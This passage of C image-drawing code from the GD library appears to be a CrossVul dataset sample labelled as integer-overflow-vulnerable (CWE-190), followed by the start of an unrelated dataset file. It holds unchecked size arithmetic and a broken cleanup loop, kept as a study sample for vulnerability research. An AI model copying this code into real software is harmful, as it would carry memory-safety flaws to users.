if (nc==gdTiled){
_gdImageFillTiled(im,x,y,nc);
im->alphaBlendingFlag = alphablending_bak;
return;
}
wx2=im->sx;wy2=im->sy;
oc = gdImageGetPixel(im, x, y);
if (oc==nc || x<0 || x>wx2 || y<0 || y>wy2) {
im->alphaBlendingFlag = alphablending_bak;
return;
}
/* Do not use the 4 neighbors implementation with
* small images
*/
if (im->sx < 4) {
int ix = x, iy = y, c;
do {
do {
c = gdImageGetPixel(im, ix, iy);
if (c != oc) {
goto done;
}
gdImageSetPixel(im, ix, iy, nc);
} while(ix++ < (im->sx -1));
ix = x;
} while(iy++ < (im->sy -1));
goto done;
}
stack = (struct seg *)safe_emalloc(sizeof(struct seg), ((int)(im->sy*im->sx)/4), 1);
sp = stack;
/* required! */
FILL_PUSH(y,x,x,1);
/* seed segment (popped 1st) */
FILL_PUSH(y+1, x, x, -1);
while (sp>stack) {
FILL_POP(y, x1, x2, dy);
for (x=x1; x>=0 && gdImageGetPixel(im,x, y)==oc; x--) {
gdImageSetPixel(im,x, y, nc);
}
if (x>=x1) {
goto skip;
}
l = x+1;
/* leak on left? */
if (l<x1) {
FILL_PUSH(y, l, x1-1, -dy);
}
x = x1+1;
do {
for (; x<=wx2 && gdImageGetPixel(im,x, y)==oc; x++) {
gdImageSetPixel(im, x, y, nc);
}
FILL_PUSH(y, l, x-1, dy);
/* leak on right? */
if (x>x2+1) {
FILL_PUSH(y, x2+1, x-1, -dy);
}
skip: for (x++; x<=x2 && (gdImageGetPixel(im, x, y)!=oc); x++);
l = x;
} while (x<=x2);
}
efree(stack);
done:
im->alphaBlendingFlag = alphablending_bak;
}
static void _gdImageFillTiled(gdImagePtr im, int x, int y, int nc)
{
int i, l, x1, x2, dy;
int oc; /* old pixel value */
int wx2,wy2;
/* stack of filled segments */
struct seg *stack;
struct seg *sp;
char **pts;
if (!im->tile) {
return;
}
wx2=im->sx;wy2=im->sy;
nc = gdImageTileGet(im,x,y);
pts = (char **) ecalloc(im->sy + 1, sizeof(char *));
for (i = 0; i < im->sy + 1; i++) {
pts[i] = (char *) ecalloc(im->sx + 1, sizeof(char));
}
stack = (struct seg *)safe_emalloc(sizeof(struct seg), ((int)(im->sy*im->sx)/4), 1);
sp = stack;
oc = gdImageGetPixel(im, x, y);
/* required! */
FILL_PUSH(y,x,x,1);
/* seed segment (popped 1st) */
FILL_PUSH(y+1, x, x, -1);
while (sp>stack) {
FILL_POP(y, x1, x2, dy);
for (x=x1; x>=0 && (!pts[y][x] && gdImageGetPixel(im,x,y)==oc); x--) {
nc = gdImageTileGet(im,x,y);
pts[y][x] = 1;
gdImageSetPixel(im,x, y, nc);
}
if (x>=x1) {
goto skip;
}
l = x+1;
/* leak on left? */
if (l<x1) {
FILL_PUSH(y, l, x1-1, -dy);
}
x = x1+1;
do {
for(; x<wx2 && (!pts[y][x] && gdImageGetPixel(im,x, y)==oc); x++) {
nc = gdImageTileGet(im,x,y);
pts[y][x] = 1;
gdImageSetPixel(im, x, y, nc);
}
FILL_PUSH(y, l, x-1, dy);
/* leak on right? */
if (x>x2+1) {
FILL_PUSH(y, x2+1, x-1, -dy);
}
skip: for(x++; x<=x2 && (pts[y][x] || gdImageGetPixel(im,x, y)!=oc); x++);
l = x;
} while (x<=x2);
}
for(i = 0; i < im->sy + 1; i++) {
efree(pts[i]);
}
efree(pts);
efree(stack);
}
void gdImageRectangle (gdImagePtr im, int x1, int y1, int x2, int y2, int color)
{
int x1h = x1, x1v = x1, y1h = y1, y1v = y1, x2h = x2, x2v = x2, y2h = y2, y2v = y2;
int thick = im->thick;
int t;
if (x1 == x2 && y1 == y2 && thick == 1) {
gdImageSetPixel(im, x1, y1, color);
return;
}
if (y2 < y1) {
t=y1;
y1 = y2;
y2 = t;
t = x1;
x1 = x2;
x2 = t;
}
x1h = x1; x1v = x1; y1h = y1; y1v = y1; x2h = x2; x2v = x2; y2h = y2; y2v = y2;
if (thick > 1) {
int cx, cy, x1ul, y1ul, x2lr, y2lr;
int half = thick >> 1;
x1ul = x1 - half;
y1ul = y1 - half;
x2lr = x2 + half;
y2lr = y2 + half;
cy = y1ul + thick;
while (cy-- > y1ul) {
cx = x1ul - 1;
while (cx++ < x2lr) {
gdImageSetPixel(im, cx, cy, color);
}
}
cy = y2lr - thick;
while (cy++ < y2lr) {
cx = x1ul - 1;
while (cx++ < x2lr) {
gdImageSetPixel(im, cx, cy, color);
}
}
cy = y1ul + thick - 1;
while (cy++ < y2lr -thick) {
cx = x1ul - 1;
while (cx++ < x1ul + thick) {
gdImageSetPixel(im, cx, cy, color);
}
}
cy = y1ul + thick - 1;
while (cy++ < y2lr -thick) {
cx = x2lr - thick - 1;
while (cx++ < x2lr) {
gdImageSetPixel(im, cx, cy, color);
}
}
return;
} else {
y1v = y1h + 1;
y2v = y2h - 1;
gdImageLine(im, x1h, y1h, x2h, y1h, color);
gdImageLine(im, x1h, y2h, x2h, y2h, color);
gdImageLine(im, x1v, y1v, x1v, y2v, color);
gdImageLine(im, x2v, y1v, x2v, y2v, color);
}
}
void gdImageFilledRectangle (gdImagePtr im, int x1, int y1, int x2, int y2, int color)
{
int x, y;
if (x1 == x2 && y1 == y2) {
gdImageSetPixel(im, x1, y1, color);
return;
}
if (x1 > x2) {
x = x1;
x1 = x2;
x2 = x;
}
if (y1 > y2) {
y = y1;
y1 = y2;
y2 = y;
}
if (x1 < 0) {
x1 = 0;
}
if (x2 >= gdImageSX(im)) {
x2 = gdImageSX(im) - 1;
}
if (y1 < 0) {
y1 = 0;
}
if (y2 >= gdImageSY(im)) {
y2 = gdImageSY(im) - 1;
}
for (y = y1; (y <= y2); y++) {
for (x = x1; (x <= x2); x++) {
gdImageSetPixel (im, x, y, color);
}
}
}
void gdImageCopy (gdImagePtr dst, gdImagePtr src, int dstX, int dstY, int srcX, int srcY, int w, int h)
{
int c;
int x, y;
int tox, toy;
int i;
int colorMap[gdMaxColors];
if (dst->trueColor) {
/* 2.0: much easier when the destination is truecolor. */
/* 2.0.10: needs a transparent-index check that is still valid if
* the source is not truecolor. Thanks to Frank Warmerdam.
*/
if (src->trueColor) {
for (y = 0; (y < h); y++) {
for (x = 0; (x < w); x++) {
int c = gdImageGetTrueColorPixel (src, srcX + x, srcY + y);
gdImageSetPixel (dst, dstX + x, dstY + y, c);
}
}
} else {
/* source is palette based */
for (y = 0; (y < h); y++) {
for (x = 0; (x < w); x++) {
int c = gdImageGetPixel (src, srcX + x, srcY + y);
if (c != src->transparent) {
gdImageSetPixel(dst, dstX + x, dstY + y, gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]));
}
}
}
}
return;
}
/* Destination is palette based */
if (src->trueColor) { /* But source is truecolor (Ouch!) */
toy = dstY;
for (y = srcY; (y < (srcY + h)); y++) {
tox = dstX;
for (x = srcX; x < (srcX + w); x++) {
int nc;
c = gdImageGetPixel (src, x, y);
/* Get best match possible. */
nc = gdImageColorResolveAlpha(dst, gdTrueColorGetRed(c), gdTrueColorGetGreen(c), gdTrueColorGetBlue(c), gdTrueColorGetAlpha(c));
gdImageSetPixel(dst, tox, toy, nc);
tox++;
}
toy++;
}
return;
}
/* Palette based to palette based */
for (i = 0; i < gdMaxColors; i++) {
colorMap[i] = (-1);
}
toy = dstY;
for (y = srcY; y < (srcY + h); y++) {
tox = dstX;
for (x = srcX; x < (srcX + w); x++) {
int nc;
int mapTo;
c = gdImageGetPixel (src, x, y);
/* Added 7/24/95: support transparent copies */
if (gdImageGetTransparent (src) == c) {
tox++;
continue;
}
/* Have we established a mapping for this color? */
if (src->trueColor) {
/* 2.05: remap to the palette available in the destination image. This is slow and
* works badly, but it beats crashing! Thanks to Padhrig McCarthy.
*/
mapTo = gdImageColorResolveAlpha (dst, gdTrueColorGetRed (c), gdTrueColorGetGreen (c), gdTrueColorGetBlue (c), gdTrueColorGetAlpha (c));
} else if (colorMap[c] == (-1)) {
/* If it's the same image, mapping is trivial */
if (dst == src) {
nc = c;
} else {
/* Get best match possible. This function never returns error. */
nc = gdImageColorResolveAlpha (dst, src->red[c], src->green[c], src->blue[c], src->alpha[c]);
}
colorMap[c] = nc;
mapTo = colorMap[c];
} else {
mapTo = colorMap[c];
}
gdImageSetPixel (dst, tox, toy, mapTo);
tox++;
}
toy++;
}
}
/* This function is a substitute for real alpha channel operations,
so it doesn't pay attention to the alpha channel. */
void gdImageCopyMerge (gdImagePtr dst, gdImagePtr src, int dstX, int dstY, int srcX, int srcY, int w, int h, int pct)
{
int c, dc;
int x, y;
int tox, toy;
int ncR, ncG, ncB;
toy = dstY;
for (y = srcY; y < (srcY + h); y++) {
tox = dstX;
for (x = srcX; x < (srcX + w); x++) {
int nc;
c = gdImageGetPixel(src, x, y);
/* Added 7/24/95: support transparent copies */
if (gdImageGetTransparent(src) == c) {
tox++;
continue;
}
/* If it's the same image, mapping is trivial */
if (dst == src) {
nc = c;
} else {
dc = gdImageGetPixel(dst, tox, toy);
ncR = (int)(gdImageRed (src, c) * (pct / 100.0) + gdImageRed (dst, dc) * ((100 - pct) / 100.0));
ncG = (int)(gdImageGreen (src, c) * (pct / 100.0) + gdImageGreen (dst, dc) * ((100 - pct) / 100.0));
ncB = (int)(gdImageBlue (src, c) * (pct / 100.0) + gdImageBlue (dst, dc) * ((100 - pct) / 100.0));
/* Find a reasonable color */
nc = gdImageColorResolve (dst, ncR, ncG, ncB);
}
gdImageSetPixel (dst, tox, toy, nc);
tox++;
}
toy++;
}
}
/* This function is a substitute for real alpha channel operations,
so it doesn't pay attention to the alpha channel. */
void gdImageCopyMergeGray (gdImagePtr dst, gdImagePtr src, int dstX, int dstY, int srcX, int srcY, int w, int h, int pct)
{
int c, dc;
int x, y;
int tox, toy;
int ncR, ncG, ncB;
float g;
toy = dstY;
for (y = srcY; (y < (srcY + h)); y++) {
tox = dstX;
for (x = srcX; (x < (srcX + w)); x++) {
int nc;
c = gdImageGetPixel (src, x, y);
/* Added 7/24/95: support transparent copies */
if (gdImageGetTransparent(src) == c) {
tox++;
continue;
}
/*
* If it's the same image, mapping is NOT trivial since we
* merge with greyscale target, but if pct is 100, the grey
* value is not used, so it becomes trivial. pjw 2.0.12.
*/
if (dst == src && pct == 100) {
nc = c;
} else {
dc = gdImageGetPixel(dst, tox, toy);
g = (0.29900f * gdImageRed(dst, dc)) + (0.58700f * gdImageGreen(dst, dc)) + (0.11400f * gdImageBlue(dst, dc));
ncR = (int)(gdImageRed (src, c) * (pct / 100.0f) + g * ((100 - pct) / 100.0));
ncG = (int)(gdImageGreen (src, c) * (pct / 100.0f) + g * ((100 - pct) / 100.0));
ncB = (int)(gdImageBlue (src, c) * (pct / 100.0f) + g * ((100 - pct) / 100.0));
/* First look for an exact match */
nc = gdImageColorExact(dst, ncR, ncG, ncB);
if (nc == (-1)) {
/* No, so try to allocate it */
nc = gdImageColorAllocate(dst, ncR, ncG, ncB);
/* If we're out of colors, go for the closest color */
if (nc == (-1)) {
nc = gdImageColorClosest(dst, ncR, ncG, ncB);
}
}
}
gdImageSetPixel(dst, tox, toy, nc);
tox++;
}
toy++;
}
}
void gdImageCopyResized (gdImagePtr dst, gdImagePtr src, int dstX, int dstY, int srcX, int srcY, int dstW, int dstH, int srcW, int srcH)
{
int c;
int x, y;
int tox, toy;
int ydest;
int i;
int colorMap[gdMaxColors];
/* Stretch vectors */
int *stx, *sty;
if (overflow2(sizeof(int), srcW)) {
return;
}
if (overflow2(sizeof(int), srcH)) {
return;
}
stx = (int *) gdMalloc (sizeof (int) * srcW);
sty = (int *) gdMalloc (sizeof (int) * srcH);
/* Fixed by Mao Morimoto 2.0.16 */
for (i = 0; (i < srcW); i++) {
stx[i] = dstW * (i+1) / srcW - dstW * i / srcW ;
}
for (i = 0; (i < srcH); i++) {
sty[i] = dstH * (i+1) / srcH - dstH * i / srcH ;
}
for (i = 0; (i < gdMaxColors); i++) {
colorMap[i] = (-1);
}
toy = dstY;
for (y = srcY; (y < (srcY + srcH)); y++) {
for (ydest = 0; (ydest < sty[y - srcY]); ydest++) {
tox = dstX;
for (x = srcX; (x < (srcX + srcW)); x++) {
int nc = 0;
int mapTo;
if (!stx[x - srcX]) {
continue;
}
if (dst->trueColor) {
/* 2.0.9: Thorben Kundinger: Maybe the source image is not a truecolor image */
if (!src->trueColor) {
int tmp = gdImageGetPixel (src, x, y);
mapTo = gdImageGetTrueColorPixel (src, x, y);
if (gdImageGetTransparent (src) == tmp) {
/* 2.0.21, TK: not tox++ */
tox += stx[x - srcX];
continue;
}
} else {
/* TK: old code follows */
mapTo = gdImageGetTrueColorPixel (src, x, y);
/* Added 7/24/95: support transparent copies */
if (gdImageGetTransparent (src) == mapTo) {
/* 2.0.21, TK: not tox++ */
tox += stx[x - srcX];
continue;
}
}
} else {
c = gdImageGetPixel (src, x, y);
/* Added 7/24/95: support transparent copies */
if (gdImageGetTransparent (src) == c) {
tox += stx[x - srcX];
continue;
}
if (src->trueColor) {
/* Remap to the palette available in the destination image. This is slow and works badly. */
mapTo = gdImageColorResolveAlpha(dst, gdTrueColorGetRed(c),
gdTrueColorGetGreen(c),
gdTrueColorGetBlue(c),
gdTrueColorGetAlpha (c));
} else {
/* Have we established a mapping for this color? */
if (colorMap[c] == (-1)) {
/* If it's the same image, mapping is trivial */
if (dst == src) {
nc = c;
} else {
/* Find or create the best match */
/* 2.0.5: can't use gdTrueColorGetRed, etc with palette */
nc = gdImageColorResolveAlpha(dst, gdImageRed(src, c),
gdImageGreen(src, c),
gdImageBlue(src, c),
gdImageAlpha(src, c));
}
colorMap[c] = nc;
}
mapTo = colorMap[c];
}
}
for (i = 0; (i < stx[x - srcX]); i++) {
gdImageSetPixel (dst, tox, toy, mapTo);
tox++;
}
}
toy++;
}
}
gdFree (stx);
gdFree (sty);
}
/* When gd 1.x was first created, floating point was to be avoided.
These days it is often faster than table lookups or integer
arithmetic. The routine below is shamelessly, gloriously
floating point. TBB */
void gdImageCopyResampled (gdImagePtr dst, gdImagePtr src, int dstX, int dstY, int srcX, int srcY, int dstW, int dstH, int srcW, int srcH)
{
int x, y;
double sy1, sy2, sx1, sx2;
if (!dst->trueColor) {
gdImageCopyResized (dst, src, dstX, dstY, srcX, srcY, dstW, dstH, srcW, srcH);
return;
}
for (y = dstY; (y < dstY + dstH); y++) {
sy1 = ((double) y - (double) dstY) * (double) srcH / (double) dstH;
sy2 = ((double) (y + 1) - (double) dstY) * (double) srcH / (double) dstH;
for (x = dstX; (x < dstX + dstW); x++) {
double sx, sy;
double spixels = 0;
double red = 0.0, green = 0.0, blue = 0.0, alpha = 0.0;
double alpha_factor, alpha_sum = 0.0, contrib_sum = 0.0;
sx1 = ((double) x - (double) dstX) * (double) srcW / dstW;
sx2 = ((double) (x + 1) - (double) dstX) * (double) srcW / dstW;
sy = sy1;
do {
double yportion;
if (floor_cast(sy) == floor_cast(sy1)) {
yportion = 1.0f - (sy - floor_cast(sy));
if (yportion > sy2 - sy1) {
yportion = sy2 - sy1;
}
sy = floor_cast(sy);
} else if (sy == floorf(sy2)) {
yportion = sy2 - floor_cast(sy2);
} else {
yportion = 1.0f;
}
sx = sx1;
do {
double xportion;
double pcontribution;
int p;
if (floorf(sx) == floor_cast(sx1)) {
xportion = 1.0f - (sx - floor_cast(sx));
if (xportion > sx2 - sx1) {
xportion = sx2 - sx1;
}
sx = floor_cast(sx);
} else if (sx == floorf(sx2)) {
xportion = sx2 - floor_cast(sx2);
} else {
xportion = 1.0f;
}
pcontribution = xportion * yportion;
p = gdImageGetTrueColorPixel(src, (int) sx + srcX, (int) sy + srcY);
alpha_factor = ((gdAlphaMax - gdTrueColorGetAlpha(p))) * pcontribution;
red += gdTrueColorGetRed (p) * alpha_factor;
green += gdTrueColorGetGreen (p) * alpha_factor;
blue += gdTrueColorGetBlue (p) * alpha_factor;
alpha += gdTrueColorGetAlpha (p) * pcontribution;
alpha_sum += alpha_factor;
contrib_sum += pcontribution;
spixels += xportion * yportion;
sx += 1.0f;
}
while (sx < sx2);
sy += 1.0f;
}
while (sy < sy2);
if (spixels != 0.0f) {
red /= spixels;
green /= spixels;
blue /= spixels;
alpha /= spixels;
alpha += 0.5;
}
if ( alpha_sum != 0.0f) {
if( contrib_sum != 0.0f) {
alpha_sum /= contrib_sum;
}
red /= alpha_sum;
green /= alpha_sum;
blue /= alpha_sum;
}
/* Clamping to allow for rounding errors above */
if (red > 255.0f) {
red = 255.0f;
}
if (green > 255.0f) {
green = 255.0f;
}
if (blue > 255.0f) {
blue = 255.0f;
}
if (alpha > gdAlphaMax) {
alpha = gdAlphaMax;
}
gdImageSetPixel(dst, x, y, gdTrueColorAlpha ((int) red, (int) green, (int) blue, (int) alpha));
}
}
}
void gdImagePolygon (gdImagePtr im, gdPointPtr p, int n, int c)
{
int i;
int lx, ly;
typedef void (*image_line)(gdImagePtr im, int x1, int y1, int x2, int y2, int color);
image_line draw_line;
if (n <= 0) {
return;
}
/* Let it be known that we are drawing a polygon so that the opacity
* mask doesn't get cleared after each line.
*/
if (c == gdAntiAliased) {
im->AA_polygon = 1;
}
if ( im->antialias) {
draw_line = gdImageAALine;
} else {
draw_line = gdImageLine;
}
lx = p->x;
ly = p->y;
draw_line(im, lx, ly, p[n - 1].x, p[n - 1].y, c);
for (i = 1; i < n; i++) {
p++;
draw_line(im, lx, ly, p->x, p->y, c);
lx = p->x;
ly = p->y;
}
if (c == gdAntiAliased) {
im->AA_polygon = 0;
gdImageAABlend(im);
}
}
int gdCompareInt (const void *a, const void *b);
/* THANKS to Kirsten Schulz for the polygon fixes! */
/* The intersection finding technique of this code could be improved
* by remembering the previous intertersection, and by using the slope.
* That could help to adjust intersections to produce a nice
* interior_extrema.
*/
void gdImageFilledPolygon (gdImagePtr im, gdPointPtr p, int n, int c)
{
int i;
int y;
int miny, maxy, pmaxy;
int x1, y1;
int x2, y2;
int ind1, ind2;
int ints;
int fill_color;
if (n <= 0) {
return;
}
if (overflow2(sizeof(int), n)) {
return;
}
if (c == gdAntiAliased) {
fill_color = im->AA_color;
} else {
fill_color = c;
}
if (!im->polyAllocated) {
im->polyInts = (int *) gdMalloc(sizeof(int) * n);
im->polyAllocated = n;
}
if (im->polyAllocated < n) {
while (im->polyAllocated < n) {
im->polyAllocated *= 2;
}
if (overflow2(sizeof(int), im->polyAllocated)) {
return;
}
im->polyInts = (int *) gdRealloc(im->polyInts, sizeof(int) * im->polyAllocated);
}
miny = p[0].y;
maxy = p[0].y;
for (i = 1; i < n; i++) {
if (p[i].y < miny) {
miny = p[i].y;
}
if (p[i].y > maxy) {
maxy = p[i].y;
}
}
pmaxy = maxy;
/* 2.0.16: Optimization by Ilia Chipitsine -- don't waste time offscreen */
if (miny < 0) {
miny = 0;
}
if (maxy >= gdImageSY(im)) {
maxy = gdImageSY(im) - 1;
}
/* Fix in 1.3: count a vertex only once */
for (y = miny; y <= maxy; y++) {
/*1.4 int interLast = 0; */
/* int dirLast = 0; */
/* int interFirst = 1; */
ints = 0;
for (i = 0; i < n; i++) {
if (!i) {
ind1 = n - 1;
ind2 = 0;
} else {
ind1 = i - 1;
ind2 = i;
}
y1 = p[ind1].y;
y2 = p[ind2].y;
if (y1 < y2) {
x1 = p[ind1].x;
x2 = p[ind2].x;
} else if (y1 > y2) {
y2 = p[ind1].y;
y1 = p[ind2].y;
x2 = p[ind1].x;
x1 = p[ind2].x;
} else {
continue;
}
/* Do the following math as float intermediately, and round to ensure
* that Polygon and FilledPolygon for the same set of points have the
* same footprint.
*/
if (y >= y1 && y < y2) {
im->polyInts[ints++] = (float) ((y - y1) * (x2 - x1)) / (float) (y2 - y1) + 0.5 + x1;
} else if (y == pmaxy && y == y2) {
im->polyInts[ints++] = x2;
}
}
qsort(im->polyInts, ints, sizeof(int), gdCompareInt);
for (i = 0; i < ints - 1; i += 2) {
gdImageLine(im, im->polyInts[i], y, im->polyInts[i + 1], y, fill_color);
}
}
/* If we are drawing this AA, then redraw the border with AA lines. */
if (c == gdAntiAliased) {
gdImagePolygon(im, p, n, c);
}
}
int gdCompareInt (const void *a, const void *b)
{
return (*(const int *) a) - (*(const int *) b);
}
void gdImageSetStyle (gdImagePtr im, int *style, int noOfPixels)
{
if (im->style) {
gdFree(im->style);
}
im->style = (int *) gdMalloc(sizeof(int) * noOfPixels);
memcpy(im->style, style, sizeof(int) * noOfPixels);
im->styleLength = noOfPixels;
im->stylePos = 0;
}
void gdImageSetThickness (gdImagePtr im, int thickness)
{
im->thick = thickness;
}
void gdImageSetBrush (gdImagePtr im, gdImagePtr brush)
{
int i;
im->brush = brush;
if (!im->trueColor && !im->brush->trueColor) {
for (i = 0; i < gdImageColorsTotal(brush); i++) {
int index;
index = gdImageColorResolveAlpha(im, gdImageRed(brush, i), gdImageGreen(brush, i), gdImageBlue(brush, i), gdImageAlpha(brush, i));
im->brushColorMap[i] = index;
}
}
}
void gdImageSetTile (gdImagePtr im, gdImagePtr tile)
{
int i;
im->tile = tile;
if (!im->trueColor && !im->tile->trueColor) {
for (i = 0; i < gdImageColorsTotal(tile); i++) {
int index;
index = gdImageColorResolveAlpha(im, gdImageRed(tile, i), gdImageGreen(tile, i), gdImageBlue(tile, i), gdImageAlpha(tile, i));
im->tileColorMap[i] = index;
}
}
}
void gdImageSetAntiAliased (gdImagePtr im, int c)
{
im->AA = 1;
im->AA_color = c;
im->AA_dont_blend = -1;
}
void gdImageSetAntiAliasedDontBlend (gdImagePtr im, int c, int dont_blend)
{
im->AA = 1;
im->AA_color = c;
im->AA_dont_blend = dont_blend;
}
void gdImageInterlace (gdImagePtr im, int interlaceArg)
{
im->interlace = interlaceArg;
}
int gdImageCompare (gdImagePtr im1, gdImagePtr im2)
{
int x, y;
int p1, p2;
int cmpStatus = 0;
int sx, sy;
if (im1->interlace != im2->interlace) {
cmpStatus |= GD_CMP_INTERLACE;
}
if (im1->transparent != im2->transparent) {
cmpStatus |= GD_CMP_TRANSPARENT;
}
if (im1->trueColor != im2->trueColor) {
cmpStatus |= GD_CMP_TRUECOLOR;
}
sx = im1->sx;
if (im1->sx != im2->sx) {
cmpStatus |= GD_CMP_SIZE_X + GD_CMP_IMAGE;
if (im2->sx < im1->sx) {
sx = im2->sx;
}
}
sy = im1->sy;
if (im1->sy != im2->sy) {
cmpStatus |= GD_CMP_SIZE_Y + GD_CMP_IMAGE;
if (im2->sy < im1->sy) {
sy = im2->sy;
}
}
if (im1->colorsTotal != im2->colorsTotal) {
cmpStatus |= GD_CMP_NUM_COLORS;
}
for (y = 0; y < sy; y++) {
for (x = 0; x < sx; x++) {
p1 = im1->trueColor ? gdImageTrueColorPixel(im1, x, y) : gdImagePalettePixel(im1, x, y);
p2 = im2->trueColor ? gdImageTrueColorPixel(im2, x, y) : gdImagePalettePixel(im2, x, y);
if (gdImageRed(im1, p1) != gdImageRed(im2, p2)) {
cmpStatus |= GD_CMP_COLOR + GD_CMP_IMAGE;
break;
}
if (gdImageGreen(im1, p1) != gdImageGreen(im2, p2)) {
cmpStatus |= GD_CMP_COLOR + GD_CMP_IMAGE;
break;
}
if (gdImageBlue(im1, p1) != gdImageBlue(im2, p2)) {
cmpStatus |= GD_CMP_COLOR + GD_CMP_IMAGE;
break;
}
#if 0
/* Soon we'll add alpha channel to palettes */
if (gdImageAlpha(im1, p1) != gdImageAlpha(im2, p2)) {
cmpStatus |= GD_CMP_COLOR + GD_CMP_IMAGE;
break;
}
#endif
}
if (cmpStatus & GD_CMP_COLOR) {
break;
}
}
return cmpStatus;
}
int
gdAlphaBlendOld (int dst, int src)
{
/* 2.0.12: TBB: alpha in the destination should be a
* component of the result. Thanks to Frank Warmerdam for
* pointing out the issue.
*/
return ((((gdTrueColorGetAlpha (src) *
gdTrueColorGetAlpha (dst)) / gdAlphaMax) << 24) +
((((gdAlphaTransparent - gdTrueColorGetAlpha (src)) *
gdTrueColorGetRed (src) / gdAlphaMax) +
(gdTrueColorGetAlpha (src) *
gdTrueColorGetRed (dst)) / gdAlphaMax) << 16) +
((((gdAlphaTransparent - gdTrueColorGetAlpha (src)) *
gdTrueColorGetGreen (src) / gdAlphaMax) +
(gdTrueColorGetAlpha (src) *
gdTrueColorGetGreen (dst)) / gdAlphaMax) << 8) +
(((gdAlphaTransparent - gdTrueColorGetAlpha (src)) *
gdTrueColorGetBlue (src) / gdAlphaMax) +
(gdTrueColorGetAlpha (src) *
gdTrueColorGetBlue (dst)) / gdAlphaMax));
}
int gdAlphaBlend (int dst, int src) {
int src_alpha = gdTrueColorGetAlpha(src);
int dst_alpha, alpha, red, green, blue;
int src_weight, dst_weight, tot_weight;
/* -------------------------------------------------------------------- */
/* Simple cases we want to handle fast. */
/* -------------------------------------------------------------------- */
if( src_alpha == gdAlphaOpaque )
return src;
dst_alpha = gdTrueColorGetAlpha(dst);
if( src_alpha == gdAlphaTransparent )
return dst;
if( dst_alpha == gdAlphaTransparent )
return src;
/* -------------------------------------------------------------------- */
/* What will the source and destination alphas be? Note that */
/* the destination weighting is substantially reduced as the */
/* overlay becomes quite opaque. */
/* -------------------------------------------------------------------- */
src_weight = gdAlphaTransparent - src_alpha;
dst_weight = (gdAlphaTransparent - dst_alpha) * src_alpha / gdAlphaMax;
tot_weight = src_weight + dst_weight;
/* -------------------------------------------------------------------- */
/* What red, green and blue result values will we use? */
/* -------------------------------------------------------------------- */
alpha = src_alpha * dst_alpha / gdAlphaMax;
red = (gdTrueColorGetRed(src) * src_weight
+ gdTrueColorGetRed(dst) * dst_weight) / tot_weight;
green = (gdTrueColorGetGreen(src) * src_weight
+ gdTrueColorGetGreen(dst) * dst_weight) / tot_weight;
blue = (gdTrueColorGetBlue(src) * src_weight
+ gdTrueColorGetBlue(dst) * dst_weight) / tot_weight;
/* -------------------------------------------------------------------- */
/* Return merged result. */
/* -------------------------------------------------------------------- */
return ((alpha << 24) + (red << 16) + (green << 8) + blue);
}
void gdImageAlphaBlending (gdImagePtr im, int alphaBlendingArg)
{
im->alphaBlendingFlag = alphaBlendingArg;
}
void gdImageAntialias (gdImagePtr im, int antialias)
{
if (im->trueColor){
im->antialias = antialias;
}
}
void gdImageSaveAlpha (gdImagePtr im, int saveAlphaArg)
{
im->saveAlphaFlag = saveAlphaArg;
}
static int gdLayerOverlay (int dst, int src)
{
int a1, a2;
a1 = gdAlphaMax - gdTrueColorGetAlpha(dst);
a2 = gdAlphaMax - gdTrueColorGetAlpha(src);
return ( ((gdAlphaMax - a1*a2/gdAlphaMax) << 24) +
(gdAlphaOverlayColor( gdTrueColorGetRed(src), gdTrueColorGetRed(dst), gdRedMax ) << 16) +
(gdAlphaOverlayColor( gdTrueColorGetGreen(src), gdTrueColorGetGreen(dst), gdGreenMax ) << 8) +
(gdAlphaOverlayColor( gdTrueColorGetBlue(src), gdTrueColorGetBlue(dst), gdBlueMax ))
);
}
static int gdAlphaOverlayColor (int src, int dst, int max )
{
/* this function implements the algorithm
*
* for dst[rgb] < 0.5,
* c[rgb] = 2.src[rgb].dst[rgb]
* and for dst[rgb] > 0.5,
* c[rgb] = -2.src[rgb].dst[rgb] + 2.dst[rgb] + 2.src[rgb] - 1
*
*/
dst = dst << 1;
if( dst > max ) {
/* in the "light" zone */
return dst + (src << 1) - (dst * src / max) - max;
} else {
/* in the "dark" zone */
return dst * src / max;
}
}
void gdImageSetClip (gdImagePtr im, int x1, int y1, int x2, int y2)
{
if (x1 < 0) {
x1 = 0;
}
if (x1 >= im->sx) {
x1 = im->sx - 1;
}
if (x2 < 0) {
x2 = 0;
}
if (x2 >= im->sx) {
x2 = im->sx - 1;
}
if (y1 < 0) {
y1 = 0;
}
if (y1 >= im->sy) {
y1 = im->sy - 1;
}
if (y2 < 0) {
y2 = 0;
}
if (y2 >= im->sy) {
y2 = im->sy - 1;
}
im->cx1 = x1;
im->cy1 = y1;
im->cx2 = x2;
im->cy2 = y2;
}
void gdImageGetClip (gdImagePtr im, int *x1P, int *y1P, int *x2P, int *y2P)
{
*x1P = im->cx1;
*y1P = im->cy1;
*x2P = im->cx2;
*y2P = im->cy2;
}
/* convert a palette image to true color */
int gdImagePaletteToTrueColor(gdImagePtr src)
{
unsigned int y;
unsigned int yy;
if (src == NULL) {
return 0;
}
if (src->trueColor == 1) {
return 1;
} else {
unsigned int x;
const unsigned int sy = gdImageSY(src);
const unsigned int sx = gdImageSX(src);
src->tpixels = (int **) gdMalloc(sizeof(int *) * sy);
if (src->tpixels == NULL) {
return 0;
}
for (y = 0; y < sy; y++) {
const unsigned char *src_row = src->pixels[y];
int * dst_row;
/* no need to calloc it, we overwrite all pxl anyway */
src->tpixels[y] = (int *) gdMalloc(sx * sizeof(int));
if (src->tpixels[y] == NULL) {
goto clean_on_error;
}
dst_row = src->tpixels[y];
for (x = 0; x < sx; x++) {
const unsigned char c = *(src_row + x);
if (c == src->transparent) {
*(dst_row + x) = gdTrueColorAlpha(0, 0, 0, 127);
} else {
*(dst_row + x) = gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]);
}
}
}
}
/* free old palette buffer (y is sy) */
for (yy = 0; yy < y; yy++) {
gdFree(src->pixels[yy]);
}
gdFree(src->pixels);
src->trueColor = 1;
src->pixels = NULL;
src->alphaBlendingFlag = 0;
src->saveAlphaFlag = 1;
if (src->transparent >= 0) {
const unsigned char c = src->transparent;
src->transparent = gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]);
}
return 1;
clean_on_error:
if (y > 0) {
for (yy = y; yy >= yy - 1; y--) {
gdFree(src->tpixels[y]);
}
gdFree(src->tpixels);
}
return 0;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5167_1 |
crossvul-cpp_data_good_401_0 | /*
* Description: network buf manager
* History: yang@haipo.me, 2016/03/16, create
*/
# include <errno.h>
